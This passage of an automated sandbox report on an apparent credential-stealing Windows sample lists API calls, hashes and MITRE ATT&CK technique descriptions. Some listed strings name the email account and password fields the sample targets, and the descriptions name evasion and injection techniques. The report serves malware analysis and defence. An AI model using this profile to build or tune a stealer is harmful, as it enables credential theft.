API String ID: 190572456-427247929
Opcode ID: 111d3fe3cf3de278b88478875a5240f52c9cc91b538b26207c7303d9e6a3f6a3
Instruction ID: 1fbf97b0b55819c82851c7ea3a697f1c0796d20c97a22cfecd58a5260392007e
Opcode Fuzzy Hash: 111d3fe3cf3de278b88478875a5240f52c9cc91b538b26207c7303d9e6a3f6a3
Instruction Fuzzy Hash: A5C048B10142087EAE016EE19C05CBB3F5EEA44228B008429BD18E9122EA3ADE2066A4

Uniqueness

Uniqueness Score: -1.00%

Function 00404A52 Relevance: 3.1, APIs: 2, Instructions: 63registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
Part of subcall function 00402B7C: RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C

RegOpenKeyExA.KERNELBASE(00000032,?,00000000,00020119,00000000,00000009,F4B4ACDC,00000000,00000000,MachineGuid,00000032,00000000,00413DA5,00413987), ref: 00404A9A
RegQueryValueExA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000009,00000009,FE9F661A,00000000,00000000), ref: 00404ABC

Memory Dump Source

Source File: 00000003.00000002.2872695096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Awb# 1294440291; 2 ki_n; G.jbxd

Yara matches

Similarity

API ID: Heap$AllocateOpenProcessQueryValue
String ID:
API String ID: 1425999871-0
Opcode ID: bcb9612233ffeb4634d4995e45ab0b963c80d9ccd10657b8c49858d8039cb957
Instruction ID: c751ae4fb1a51baa23b068920df28fa5e45e9ad9ad003da97b765f6d6e9ada80
Opcode Fuzzy Hash: bcb9612233ffeb4634d4995e45ab0b963c80d9ccd10657b8c49858d8039cb957
Instruction Fuzzy Hash: A301B1B264010C7EEB01AED69C86DBF7B2DDB81798B10003EF60475182EAB59E1156B9

Uniqueness

Uniqueness Score: -1.00%

Function 004060BD Relevance: 1.6, APIs: 1, Instructions: 53COMMON

Download Yara Rule

APIs

CheckTokenMembership.KERNELBASE(00000000,00000000,00000000,00000009,E3B938DF,00000000,00000000,00000001), ref: 00406115

Memory Dump Source

Source File: 00000003.00000002.2872695096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Awb# 1294440291; 2 ki_n; G.jbxd

Yara matches

Similarity

API ID: CheckMembershipToken
String ID:
API String ID: 1351025785-0
Opcode ID: 4a43c4ed47dff20a0e63da0344eb6b70d0e7b4795f78c2e23bdd5dfdab477f71
Instruction ID: 8b780b9e56efd5f2a9a2252a5f210822aeafba94d0ba5a8497d60ad8274f78a0
Opcode Fuzzy Hash: 4a43c4ed47dff20a0e63da0344eb6b70d0e7b4795f78c2e23bdd5dfdab477f71
Instruction Fuzzy Hash: 7801867195020DBEEB00EBE59C86EFFB77CEF08208F100569B515B60C2EA75AF008764

Uniqueness

Uniqueness Score: -1.00%

Function 00403C62 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNELBASE(00413D1F,00000000,00000000,C8F0A74D,00000000,00000000,00000000,?,00413D1F,00000000), ref: 00403C8B

Memory Dump Source

Source File: 00000003.00000002.2872695096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Awb# 1294440291; 2 ki_n; G.jbxd

Yara matches

Similarity

API ID: CreateDirectory
String ID:
API String ID: 4241100979-0
Opcode ID: d413ab25134c4b1c761ae7c40b175d3f6038492197e92d4c0305fa2d5b60993a
Instruction ID: 8def336d827aa123259dd30fe2d1f4df156212ecddfe904d71fbacf529eca846
Opcode Fuzzy Hash: d413ab25134c4b1c761ae7c40b175d3f6038492197e92d4c0305fa2d5b60993a
Instruction Fuzzy Hash: 47D05E320450687A9A202AA7AC08CDB3E0DDE032FA7004036B81CE4052DB26861191E4

Uniqueness

Uniqueness Score: -1.00%

Function 0040642C Relevance: 1.5, APIs: 1, Instructions: 18COMMON

Download Yara Rule

APIs

GetNativeSystemInfo.KERNELBASE(?,00000000,E9AF4586,00000000,00000000,?,?,?,?,004144CF,00000000,00000000,00000000,00000000), ref: 00406445

Memory Dump Source

Source File: 00000003.00000002.2872695096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Awb# 1294440291; 2 ki_n; G.jbxd

Yara matches

Similarity

API ID: InfoNativeSystem
String ID:
API String ID: 1721193555-0
Opcode ID: 18b792e9f3ed795f2423495cf2abf5b642ecf28d7d26812d11fe043f37d9eb75
Instruction ID: 89a273ea7bbabd9d74fc824e7d15e3b55fbc967ee531cdb223f62f0d5b23fb21
Opcode Fuzzy Hash: 18b792e9f3ed795f2423495cf2abf5b642ecf28d7d26812d11fe043f37d9eb75
Instruction Fuzzy Hash: 60D0C9969142082A9B24FEB14E49CBB76EC9A48104B400AA8FC05E2180FD6ADF5482A5

Uniqueness

Uniqueness Score: -1.00%

Function 00404EEA Relevance: 1.5, APIs: 1, Instructions: 16networkCOMMON

Download Yara Rule

APIs

send.WS2_32(00000000,00000000,00000000,00000000), ref: 00404F07

Memory Dump Source

Source File: 00000003.00000002.2872695096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Awb# 1294440291; 2 ki_n; G.jbxd

Yara matches

Similarity

API ID: send
String ID:
API String ID: 2809346765-0
Opcode ID: f5f37575630baef1eb429ccea87373dc8bd2737f5fb4b11d46726e1bb86e5636
Instruction ID: 973ad19c2726000f66dbac5dad6f1ecaf56acd36cc9bde1755ab86a88c27f217
Opcode Fuzzy Hash: f5f37575630baef1eb429ccea87373dc8bd2737f5fb4b11d46726e1bb86e5636
Instruction Fuzzy Hash: F8D09231140209BBEF016E55EC05BAA3B69EF44B54F10C026BA18991A1DB31A9219A98

Uniqueness

Uniqueness Score: -1.00%

Function 00403BD0 Relevance: 1.5, APIs: 1, Instructions: 14COMMON

Download Yara Rule

APIs

MoveFileExW.KERNELBASE(00000000,00412C16,?,00000000,C9143177,00000000,00000000,?,004040B6,00000000,00412C16,00000001,?,00412C16,00000000,00000000), ref: 00403BEB

Memory Dump Source

Source File: 00000003.00000002.2872695096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Awb# 1294440291; 2 ki_n; G.jbxd

Yara matches

Similarity

API ID: FileMove
String ID:
API String ID: 3562171763-0
Opcode ID: 7a0bb135e6e1f0606704ed46507384a8cac74e7a8e8860f1f6d7d5715d4ca302
Instruction ID: 27267517ebbd606c040c475238707358b0366275ca1c9c11413b547716cf2561
Opcode Fuzzy Hash: 7a0bb135e6e1f0606704ed46507384a8cac74e7a8e8860f1f6d7d5715d4ca302
Instruction Fuzzy Hash: 5AC04C7500424C7FEF026EF19D05C7B3F5EEB49618F448825BD18D5421DA37DA216664

Uniqueness

Uniqueness Score: -1.00%

Function 00404DF3 Relevance: 1.5, APIs: 1, Instructions: 13networkCOMMON

Download Yara Rule

APIs

WSAStartup.WS2_32(00000202,?), ref: 00404E08

Memory Dump Source

Source File: 00000003.00000002.2872695096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Awb# 1294440291; 2 ki_n; G.jbxd

Yara matches

Similarity

API ID: Startup
String ID:
API String ID: 724789610-0
Opcode ID: aec8cb7098972fa6752499418e154eb0e8b54166df737fc870e0652f0f0fb75e
Instruction ID: edfb6e6a7b2c2d2c81179f298452045bbfcf768a57aceb16f5d93ae35c4528ea
Opcode Fuzzy Hash: aec8cb7098972fa6752499418e154eb0e8b54166df737fc870e0652f0f0fb75e
Instruction Fuzzy Hash: 6EC08C32AA421C9FD750AAB8AD0FAF0B7ACD30AB02F0002B56E1DC60C1E550582906E2

Uniqueness

Uniqueness Score: -1.00%

Function 0040427D Relevance: 1.5, APIs: 1, Instructions: 13COMMON

Download Yara Rule

APIs

SetFileAttributesW.KERNELBASE(00000000,00002006,00000000,CAC5886E,00000000,00000000,?,00412C3B,00000000,00000000,?), ref: 00404297

Memory Dump Source

Source File: 00000003.00000002.2872695096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Awb# 1294440291; 2 ki_n; G.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 8dd52a8075b7bef316d0fc581140073ef821e073e46509cdb91d5efed9f2b539
Instruction ID: e837d3b0865cda380a04769d40cc561620ee701a25bf2a33446201ee5459e2a9
Opcode Fuzzy Hash: 8dd52a8075b7bef316d0fc581140073ef821e073e46509cdb91d5efed9f2b539
Instruction Fuzzy Hash: A9C092B054430C3EFA102EF29D4AD3B3A8EEB41648B008435BE08E9096E977DE2061A8

Uniqueness

Uniqueness Score: -1.00%

Function 00404A19 Relevance: 1.5, APIs: 1, Instructions: 13registryCOMMON

Download Yara Rule

APIs

RegOpenKeyW.ADVAPI32(?,?,?,00000009,DB552DA5,00000000,00000000), ref: 00404A35

Memory Dump Source

Source File: 00000003.00000002.2872695096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Awb# 1294440291; 2 ki_n; G.jbxd

Yara matches

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 878e79dc60d56a32ccce77cf818dc40cd176942d244c38d6301a2c771aeba921
Instruction ID: b1d3f25f69c2166d3d07fcddbc0993e3b6974a4a806b5379996ceb22213e89af
Opcode Fuzzy Hash: 878e79dc60d56a32ccce77cf818dc40cd176942d244c38d6301a2c771aeba921
Instruction Fuzzy Hash: 5BC012311802087FFF012EC1CC02F483E1AAB08B55F044011BA18280E1EAB3A2205658

Uniqueness

Uniqueness Score: -1.00%

Function 00403C40 Relevance: 1.5, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNELBASE(00000000,00000000,FBCE7A42,00000000,00000000,?,00404344,00000000,?,?,004146E2,00000000,00000000,?,00000000,00000000), ref: 00403C55

Memory Dump Source

Source File: 00000003.00000002.2872695096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Awb# 1294440291; 2 ki_n; G.jbxd

Yara matches

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: 67fd61e36e72385b159b193fd7e1560e83aa445b7d913ea69a34d34039b65f78
Instruction ID: f60e35b61e15034c3e7e350ceef27d37971f1a6745175d5827dd76012fe363c0
Opcode Fuzzy Hash: 67fd61e36e72385b159b193fd7e1560e83aa445b7d913ea69a34d34039b65f78
Instruction Fuzzy Hash: 70B092B01182087EAE006AF29C05C3B3E4ECA4060874094267C08E5451F937DF2014B4

Uniqueness

Uniqueness Score: -1.00%

Function 00403C08 Relevance: 1.5, APIs: 1, Instructions: 12fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNELBASE(?,00000000,DEAA357B,00000000,00000000), ref: 00403C1D

Memory Dump Source

Source File: 00000003.00000002.2872695096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Awb# 1294440291; 2 ki_n; G.jbxd

Yara matches

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 01b23650ea3b3ad0b7ef3e64b7b20365c040140a899dd4cba48e3dfa7394e9f1
Instruction ID: 5639c68ad781144a2d68ff400f656d3d2c658e81fc8059c2e96e04b5885f7932
Opcode Fuzzy Hash: 01b23650ea3b3ad0b7ef3e64b7b20365c040140a899dd4cba48e3dfa7394e9f1
Instruction Fuzzy Hash: EDB092B04082093EAA013EF59C05C3B3E4DDA4010870048257D08E6111EA36DF1010A8

Uniqueness

Uniqueness Score: -1.00%

Function 00402C1F Relevance: 1.5, APIs: 1, Instructions: 12libraryCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNELBASE(?,00000000,E811E8D4,00000000,00000000), ref: 00402C34

Memory Dump Source

Source File: 00000003.00000002.2872695096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Awb# 1294440291; 2 ki_n; G.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: af34b662912c89fdb3a0f1b9ff73cd040c3e05ef601eeab43baa4f39a88cbda5
Instruction ID: cd53f9395925d29cf68d66af6aae64644fca58afce9bbcd5edfe8b9605b00cd0
Opcode Fuzzy Hash: af34b662912c89fdb3a0f1b9ff73cd040c3e05ef601eeab43baa4f39a88cbda5
Instruction Fuzzy Hash: C9B092B00082083EAA002EF59C05C7F3A4DDA4410874044397C08E5411F937DE1012A5

Uniqueness

Uniqueness Score: -1.00%

Function 00403BEF Relevance: 1.5, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

FindClose.KERNELBASE(00403F8D,00000000,DA6AE59A,00000000,00000000,?,00403F8D,00000000), ref: 00403C04

Memory Dump Source

Source File: 00000003.00000002.2872695096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Awb# 1294440291; 2 ki_n; G.jbxd

Yara matches

Similarity

API ID: CloseFind
String ID:
API String ID: 1863332320-0
Opcode ID: 9873c53fda05388afb850746851f5e32e8254642b63e91831ef49aacf0f87411
Instruction ID: 1ebc74916e7009c76bd4f38d62a0f1d2d6d24e136e2668fcc01a71b48f24aa02
Opcode Fuzzy Hash: 9873c53fda05388afb850746851f5e32e8254642b63e91831ef49aacf0f87411
Instruction Fuzzy Hash: FDB092B00442087EEE002EF1AC05C7B3F4EDA4410970044257E0CE5012E937DF1010B4

Uniqueness

Uniqueness Score: -1.00%

Function 00403BB7 Relevance: 1.5, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(00413D1F,00000000,C6808176,00000000,00000000,?,00403D58,00413D1F,?,00403C6D,00413D1F,?,00413D1F,00000000), ref: 00403BCC

Memory Dump Source

Source File: 00000003.00000002.2872695096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Awb# 1294440291; 2 ki_n; G.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 1d6dd25f7c332fd1d35fbf5985813ee51de81cf8f6e5d0f963c2f0c9ec148b39
Instruction ID: 12c622a32f4ce0ce5baf48af10e49973588d22e73ecb696d4958cc4f11b8a016
Opcode Fuzzy Hash: 1d6dd25f7c332fd1d35fbf5985813ee51de81cf8f6e5d0f963c2f0c9ec148b39
Instruction Fuzzy Hash: D2B092B05042083EAE012EF19C05C7B3A6DCA40148B4088297C18E5111ED36DE5050A4

Uniqueness

Uniqueness Score: -1.00%

Function 004049FF Relevance: 1.5, APIs: 1, Instructions: 11registryCOMMON

Download Yara Rule

APIs

RegCloseKey.KERNELBASE(00000000,00000009,D980E875,00000000,00000000,?,00404A44,?,?,00404AC6,?), ref: 00404A15

Memory Dump Source

Source File: 00000003.00000002.2872695096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Awb# 1294440291; 2 ki_n; G.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: a61027cf4d9072e61279d4b4f16a9571f3d05446971c54f2b184413104fd85b7
Instruction ID: 75bcc15c4d71fff8019d16f1d9debb39272117f3de5fdcc107556e34aff8dcac
Opcode Fuzzy Hash: a61027cf4d9072e61279d4b4f16a9571f3d05446971c54f2b184413104fd85b7
Instruction Fuzzy Hash: 7CC092312843087AEA102AE2EC0BF093E0D9B41F98F500025B61C3C1D2E9E3E6100099

Uniqueness

Uniqueness Score: -1.00%

Function 00403B64 Relevance: 1.5, APIs: 1, Instructions: 11COMMON

Download Yara Rule

APIs

PathFileExistsW.KERNELBASE(?,00000002,DC0853E1,00000000,00000000), ref: 00403B7A

Memory Dump Source

Source File: 00000003.00000002.2872695096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Awb# 1294440291; 2 ki_n; G.jbxd

Yara matches

Similarity

API ID: ExistsFilePath
String ID:
API String ID: 1174141254-0
Opcode ID: 79b415000e3dec3248a6d2155c6771fe406342b29d1d2faf8e1af97ba013cdd8
Instruction ID: 8bd75bc93bbce64143a6918826fd0663652f5dbe7ab318808702af7ec0dd126f
Opcode Fuzzy Hash: 79b415000e3dec3248a6d2155c6771fe406342b29d1d2faf8e1af97ba013cdd8
Instruction Fuzzy Hash: F4C0923028830C3BF9113AD2DC47F197E8D8B41B99F104025B70C3C4D2D9E3A6100199

Uniqueness

Uniqueness Score: -1.00%

Function 00404DE5 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

closesocket.WS2_32(00404EB0), ref: 00404DEB

Memory Dump Source

Source File: 00000003.00000002.2872695096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Awb# 1294440291; 2 ki_n; G.jbxd

Yara matches

Similarity

API ID: closesocket
String ID:
API String ID: 2781271927-0
Opcode ID: 887654383893d56b64fc04469bc98b787ac4c367861e76a9ad562a01a17cc3aa
Instruction ID: a7719220e23c04317d26723f710bfa070304820e6d91f105ed764937a1a9d613
Opcode Fuzzy Hash: 887654383893d56b64fc04469bc98b787ac4c367861e76a9ad562a01a17cc3aa
Instruction Fuzzy Hash: F4A0113000020CEBCB002B82EE088C83F2CEA882A0B808020F80C00020CB22A8208AC8

Uniqueness

Uniqueness Score: -1.00%

Function 00403F9E Relevance: 1.3, APIs: 1, Instructions: 16COMMON

Download Yara Rule

APIs

VirtualFree.KERNELBASE(0041028C,00000000,00008000,00000000,F53ECACB,00000000,00000000,00000000,?,0041028C,00000000), ref: 00403FBA

Memory Dump Source

Source File: 00000003.00000002.2872695096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Awb# 1294440291; 2 ki_n; G.jbxd

Yara matches

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: 4437192c676a59da206b473fb72d9d26ef1781d862ceba0a26f5730449a5d479
Instruction ID: 31a36aa897feec3f2575a3818ba469950b8b51fe97d839facc05156de448dee4
Opcode Fuzzy Hash: 4437192c676a59da206b473fb72d9d26ef1781d862ceba0a26f5730449a5d479
Instruction Fuzzy Hash: 9CC08C3200613C32893069DBAC0AFCB7E0CDF036F4B104021F50C6404049235A0186F8

Uniqueness

Uniqueness Score: -1.00%

Function 00406472 Relevance: 1.3, APIs: 1, Instructions: 12sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(?,00000000,CFA329AD,00000000,00000000), ref: 00406487

Memory Dump Source

Source File: 00000003.00000002.2872695096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Awb# 1294440291; 2 ki_n; G.jbxd

Yara matches

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 1807eaeb392d941871dd7f4dce37bd4a7f558bd6a955fa7349a6f4d515d7796f
Instruction ID: 8d08050a97d9600d7c0dbf2a5018eca7d85037e123ae0040efa9f3f0a7dd9c36
Opcode Fuzzy Hash: 1807eaeb392d941871dd7f4dce37bd4a7f558bd6a955fa7349a6f4d515d7796f
Instruction Fuzzy Hash: FBB092B08082083EEA002AF1AD05C3B7A8DDA4020870088257C08E5011E93ADE1150B9

Uniqueness

Uniqueness Score: -1.00%

Function 004058EA Relevance: 1.3, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

StrStrA.KERNELBASE(?,?,00000002,C5C16604,00000000,00000000), ref: 00405903

Memory Dump Source

Source File: 00000003.00000002.2872695096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Awb# 1294440291; 2 ki_n; G.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 042642b6324743061f7cb6dcc4248db4a99ff7c1e794a59b5538058313c095a3
Instruction ID: d5512459148ba4630ff55d530b0b04b7b8071b1588054f6e556ec5c474e97d6d
Opcode Fuzzy Hash: 042642b6324743061f7cb6dcc4248db4a99ff7c1e794a59b5538058313c095a3
Instruction Fuzzy Hash: 82C04C3118520876EA112AD19C07F597E1D9B45B68F108425BA1C6C4D19AB3A6505559

Uniqueness

Uniqueness Score: -1.00%

Function 00405924 Relevance: 1.3, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

StrStrW.KERNELBASE(?,?,00000002,D6865BD4,00000000,00000000), ref: 0040593D

Memory Dump Source

Source File: 00000003.00000002.2872695096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Awb# 1294440291; 2 ki_n; G.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4bee70add85649cbd4a2768cfe9b9dcd091b7df8922090f97a094487be0f2036
Instruction ID: 5151f40d070928696ad3a3dfeafe9e6e8178c5ee17630b0dfe73cc98556a196c
Opcode Fuzzy Hash: 4bee70add85649cbd4a2768cfe9b9dcd091b7df8922090f97a094487be0f2036
Instruction Fuzzy Hash: 8FC04C311842087AEA112FD2DC07F587E1D9B45B58F104015B61C2C5D1DAB3A6105659

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0040434D Relevance: 15.1, APIs: 10, Instructions: 135memorycomCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 0040438F
CoCreateInstance.OLE32(00418EC0,00000000,00000001,00418EB0,?), ref: 004043A9
VariantInit.OLEAUT32(?), ref: 004043C4
SysAllocString.OLEAUT32(?), ref: 004043CD
VariantInit.OLEAUT32(?), ref: 00404414
SysAllocString.OLEAUT32(?), ref: 00404419
VariantInit.OLEAUT32(?), ref: 00404431

Memory Dump Source

Source File: 00000003.00000002.2872695096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Awb# 1294440291; 2 ki_n; G.jbxd

Yara matches

Similarity

API ID: InitVariant$AllocString$CreateInitializeInstance
String ID:
API String ID: 1312198159-0
Opcode ID: 36af1e644ba25a92da10ffd92c092694d7a96ee7919212810e1bb10a92bc3d30
Instruction ID: 6cc2ba4480fbb4d68866773ab5e076051400aafb7d2546f6199fc19a864342a4
Opcode Fuzzy Hash: 36af1e644ba25a92da10ffd92c092694d7a96ee7919212810e1bb10a92bc3d30
Instruction Fuzzy Hash: 9A414C71A00609EFDB00EFE4DC84ADEBF79FF89314F10406AFA05AB190DB759A458B94

Uniqueness

Uniqueness Score: -1.00%

Function 0040D069 Relevance: 12.6, Strings: 10, Instructions: 138COMMON

Download Yara Rule

Strings

SmtpAccount, xrefs: 0040D0FA
SmtpPort, xrefs: 0040D0EB
Technology, xrefs: 0040D08D
PopServer, xrefs: 0040D099
PopPassword, xrefs: 0040D0D0
PopAccount, xrefs: 0040D0B6
SmtpServer, xrefs: 0040D0DC
EmailAddress, xrefs: 0040D074
PopPort, xrefs: 0040D0A7
SmtpPassword, xrefs: 0040D117

Memory Dump Source

Source File: 00000003.00000002.2872695096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Awb# 1294440291; 2 ki_n; G.jbxd

Yara matches

Similarity

API ID:
String ID: EmailAddress$PopAccount$PopPassword$PopPort$PopServer$SmtpAccount$SmtpPassword$SmtpPort$SmtpServer$Technology
API String ID: 0-2111798378
Opcode ID: 4f23c8655d16a9709c8d74bd686147b8dbb65e0931b573aa619d5bf1b9c89d18
Instruction ID: 091e628055053f5eef329adcdd4db079f25726ad560f051e033024c376855220
Opcode Fuzzy Hash: 4f23c8655d16a9709c8d74bd686147b8dbb65e0931b573aa619d5bf1b9c89d18
Instruction Fuzzy Hash: AE414EB5941218BADF127BE6DD42F9E7F76EF94304F21003AF600721B2C77A99609B48

Uniqueness

Uniqueness Score: -1.00%

Function 0040317B Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2872695096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Awb# 1294440291; 2 ki_n; G.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5b57611fa40680ed248d57f37b4973e9bad199baf80beacdc2a2503593addd55
Instruction ID: 125f84157e295c2adc52e6f8c9cb261871d96e12da6c9e12f7e31892ee598d11
Opcode Fuzzy Hash: 5b57611fa40680ed248d57f37b4973e9bad199baf80beacdc2a2503593addd55
Instruction Fuzzy Hash: 0B01A272A10204ABDB21DF59C885E6FF7FCEB49761F10417FF804A7381D639AE008A64

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

